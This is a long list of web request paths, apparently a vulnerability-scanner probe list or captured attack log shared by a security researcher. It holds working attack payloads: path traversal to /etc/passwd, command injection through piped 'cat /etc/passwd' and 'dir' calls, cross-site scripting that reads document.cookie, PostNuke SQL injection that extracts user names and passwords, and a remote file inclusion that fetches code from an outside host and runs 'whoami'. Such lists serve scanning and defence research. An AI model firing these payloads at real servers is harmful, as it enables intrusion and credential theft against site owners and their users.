/ows-bin/clickresponder.pl
/ows-bin/common/listrec.pl
/ows-bin/count.cgi
/ows-bin/csPassword.cgi
/ows-bin/csPassword/csPassword.cgi
/ows-bin/cutecast/members/
/ows-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
/ows-bin/date
/ows-bin/day5datanotifier.cgi
/ows-bin/db2www/library/document.d2w/show
/ows-bin/dcshop/orders/orders.txt
/ows-bin/echo.bat
/ows-bin/echo.bat?&dir+c:\\\\
/ows-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/ows-bin/environ.pl
/ows-bin/excite;IFS=\\"$\\";/bin/cat
/ows-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
/ows-bin/formmail
/ows-bin/formmail.pl
/ows-bin/guestbook/passwd
/ows-bin/hello.bat?&dir+c:\\\\
/ows-bin/ikonboard/help.cgi?
/ows-bin/ImageFolio/admin/admin.cgi
/ows-bin/jailshell
/ows-bin/logs/error_log
/ows-bin/lookwho.cgi
/ows-bin/ls
/ows-bin/mailit.pl
/ows-bin/maillist.cgi
/ows-bin/maillist.pl
/ows-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
/ows-bin/man.sh
/ows-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
/ows-bin/mrtg.cgi?cfg=blah
/ows-bin/MsmMask.exe?mask=/junk334
/ows-bin/mt-static/mt-check.cgi
/ows-bin/nbmember.cgi?cmd=list_all_users
/ows-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
/ows-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
/ows-bin/nlog-smb.pl
/ows-bin/nph-test-cgi
/ows-bin/opendir.php?/etc/passwd
/ows-bin/perlidlc.bat?&dir
/ows-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
/ows-bin/php.ini
/ows-bin/post-query
/ows-bin/responder.cgi
/ows-bin/rguest.exe
/ows-bin/rksh
/ows-bin/robpoll.cgi
/ows-bin/rsh
/ows-bin/scgiwrap
/ows-bin/scripts/*%0a.pl
/ows-bin/search.cgi
/ows-bin/shop/orders/orders.txt
/ows-bin/spin_client.cgi?aaaaaaaa
/ows-bin/stat/
/ows-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/ows-bin/tablebuild.pl
/ows-bin/tcsh
/ows-bin/test.cgi
/ows-bin/test/test.cgi
/ows-bin/test_cgi.pl
/ows-bin/test2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;
/ows-bin/test-env
/ows-bin/textcounter.pl
/ows-bin/update.dpgs
/ows-bin/uptime
/ows-bin/webdriver
/ows-bin/Webnews.exe
/ows-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
/ows-bin/webutil.pl
/ows-bin/webwho.pl
/ows-bin/wguest.exe
/ows-bin/wwwboard.cgi.cgi
/ows-bin/wwwboard.pl
/ows-bin/www-sql
/phpBB/My_eGallery/public/displayCategory.php
/phpBB2/search.php?search_id=1\\\\
/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
/pls/sample/admin_/help/..%255cplsql.conf
/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
/postnuke/html/My_eGallery/public/displayCategory.php
/postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
/postnuke/My_eGallery/public/displayCategory.php
/profile.php?u=6Pi2f3zm
/samples/sample_posteddata.php
/scgi-bin/architext_query.pl
/scgi-bin/banner.cgi
/scgi-bin/bannereditor.cgi
/scgi-bin/bb-ack.sh
/scgi-bin/bb-histlog.sh
/scgi-bin/bb-rep.sh
/scgi-bin/bb-replog.sh
/scgi-bin/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/scgi-bin/csPassword.cgi
/scgi-bin/csPassword/csPassword.cgi
/scgi-bin/cutecast/members/
/scgi-bin/day5datanotifier.cgi
/scgi-bin/logs/error_log
/scgi-bin/lookwho.cgi
/scgi-bin/maillist.cgi
/scgi-bin/maillist.pl
/scgi-bin/responder.cgi
/scgi-bin/rguest.exe
/scgi-bin/rksh
/scgi-bin/rsh
/scgi-bin/search.cgi
/scgi-bin/tablebuild.pl
/scgi-bin/tcsh
/scgi-bin/test.cgi
/scgi-bin/test/test.cgi
/scgi-bin/webwho.pl
/scgi-bin/wguest.exe
/scgi-bin/wwwboard.cgi.cgi
/scgi-bin/www-sql
/scripts/architext_query.pl
/scripts/banner.cgi
/scripts/bannereditor.cgi
/scripts/bb-ack.sh
/scripts/bb-histlog.sh
/scripts/bb-rep.sh
/scripts/bb-replog.sh
/scripts/bbs_forum.cgi
/scripts/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/scripts/csPassword.cgi
/scripts/csPassword/csPassword.cgi
/scripts/cutecast/members/
/scripts/day5datanotifier.cgi
/scripts/iisadmin/bdir.htr
/scripts/iisadmin/ism.dll
/scripts/logs/error_log
/scripts/lookwho.cgi
/scripts/maillist.cgi
/scripts/maillist.pl
/scripts/man.sh
/scripts/no-such-file.pl
/scripts/responder.cgi
/scripts/rguest.exe
/scripts/rksh
/scripts/rsh
/scripts/samples/details.idc
/scripts/search.cgi
/scripts/tablebuild.pl
/scripts/tcsh
/scripts/test.cgi
/scripts/test/test.cgi
/scripts/textcounter.pl
/scripts/tools/ctss.idc
/scripts/webwho.pl
/scripts/wguest.exe
/scripts/wwwboard.cgi.cgi
/scripts/wwwboard.pl
/scripts/www-sql
/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml
/search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;
/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
/site/'
/SiteServer/Admin/commerce/foundation/domain.asp
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/admin/findvserver.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/SiteServer/Knowledge/Default.asp?ctr=\\"><script>alert('Vulnerable')</script>
/soinfo.php?\\"><script>alert('Vulnerable')</script>
/splashAdmin.php
/ssdefs/
/sshome/
/sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
/supporter/index.php?t=ticketfiles&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
/supporter/index.php?t=tickettime&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
/supporter/index.php?t=updateticketlog&id=&lt;script&gt;<script>alert('Vulnerable')</script>&lt;/script&gt;
/sysinfo.pl
/templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
/test
/test.cgi
/test.cgi.php
/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
/test.py
/test.sh
/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
/test_cgi.php
/test_cgi.pl
/test-cgi
/test-cgi.pl
/themes/default/layouts/standard.php?page_include=http://cirt.net/rfiinc.txt??&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
/ticket.php?id=99999
/tiki/
/tiki/tiki-install.php
/TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
/TiVoConnect?Command=QueryServer
/tmUnblock.cgi
/TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/tsweb/
/tws/getStatus
/uname.cgi
/upload.php?type=\\"<script>alert(document.cookie)</script>
/user.php?op=userinfo&uname=<script>alert('hi');</script>
/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
/userinfo.php?uid=1;
/users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/vgn/login/1,501,,00.html?cookieName=x--\\>
/vgn/performance/TMT
/vgn/performance/TMT/Report
/vgn/performance/TMT/Report/XML
/vgn/performance/TMT/reset
/vgn/ppstats
/vgn/previewer
/vgn/record/previewer
/vgn/style
/vgn/stylepreviewer
/vgn/vr/Deleting
/vgn/vr/Editing
/vgn/vr/Saving
/vgn/vr/Select
/viewcvs.cgi
/webamil/test.php
/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
/webcgi/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,
/webcgi/architext_query.pl
/webcgi/bannereditor.cgi
/webcgi/bb-ack.sh
/webcgi/bb-histlog.sh
/webcgi/bb-rep.sh
/webcgi/bb-replog.sh
/webcgi/bbs_forum.cgi
/webcgi/bizdb1-search.cgi
/webcgi/book.cgi?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/webcgi/csPassword/csPassword.cgi
/webcgi/cutecast/members/
/webcgi/day5datanotifier.cgi
/webcgi/db2www/library/document.d2w/show
/webcgi/logs/error_log
/webcgi/lookwho.cgi
/webcgi/maillist.cgi
/webcgi/maillist.pl
/webcgi/man.sh
/webcgi/rguest.exe
/webcgi/rksh
/webcgi/rsh
/webcgi/search.cgi
/webcgi/tcsh
/webcgi/test.cgi
/webcgi/test/test.cgi
/webcgi/textcounter.pl
/webcgi/tst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,
/webcgi/webwho.pl
/webcgi/wguest.exe
/webcgi/wwwboard.cgi.cgi
/webcgi/wwwboard.pl
/webcgi/www-sql
/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\"Vulnerable\\")</script>&email1=<script>alert%20(\\"Vulnerable\\")</script>
/web-console/ServerInfo.jsp
/web-console/ServerInfo.jsp%00
/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
/welcome
/whois.cgi
/ws_ftp.ini
/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
*******
More FROM @neonprimetime security

http://pastebin.com/u/Neonprimetime
https://www.virustotal.com/en/USER/neonprimetime/
https://twitter.com/neonprimetime
https://www.reddit.com/USER/neonprimetime